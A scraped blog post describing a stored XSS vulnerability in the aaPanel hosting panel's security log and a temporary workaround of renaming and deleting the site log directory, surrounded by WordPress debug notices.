Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the copy-the-code domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /var/www/html/pcx3.com/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the pb-seo-friendly-images domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /var/www/html/pcx3.com/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the johannes domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /var/www/html/pcx3.com/wp-includes/functions.php on line 6121
aaPanel security log is vulnerable to stored XSS - PC✗3
Are you a 🤖?
Search
Search
aaPanel security log is vulnerable to stored XSS
Add comment
Share:XRedditLinkedIn

aaPanel security log is vulnerable to stored XSS

April 13, 2022

aaPanel is one of my favorite free hosting panels because it is lightweight and simple to use.

The panel gets regular updates, and it offers several unique features that you only get in premium panels like cPanel, but I believe the greatest obstacle to it getting more popular is that it is still just an English version of the Pagoda panel.

The Aaapanel would gain popularity among Western and European hosting businesses if it were completely separated from the Pagoda panel.

Recently, an XSS vulnerability in the Aapanel was discovered and is being exploited in the wild: A stored XSS vulnerability exists in the aaPanel security log.

Vulnerability

Aapanel has a Security log that records all bruteforce attempts and failed logins, however, if an attacker changes sections of the request header with malicious code, that code will be saved in the log file. The code will be executed the next time a website owner accesses the security log.

1649388536 335283 image - aaPanel security log is vulnerable to stored XSS

The problem was initially reported on the Aapanel forums on April 8th, and I’ll keep a watch on the changelog to see when it’s fixed.

Workaround

Until the issue is fixed and an update is available to the public, the following workaround can be done

Step 1. Rename the site’s log directory /www/wwwlogs

chrome gMLBKbo8of 1024x486 - aaPanel security log is vulnerable to stored XSS


Step 2. Restart webserver after making changes

image 101 1024x486 - aaPanel security log is vulnerable to stored XSS

Step 3. Delete the now renamed directory /www/wwwlogs

image 102 1024x486 - aaPanel security log is vulnerable to stored XSS

Share:XRedditLinkedIn
whoami
Stefan Pejcic
Join the discussion

I enjoy constructive responses and professional comments to my posts, and invite anyone to comment or link to my site.

You may also like

Menu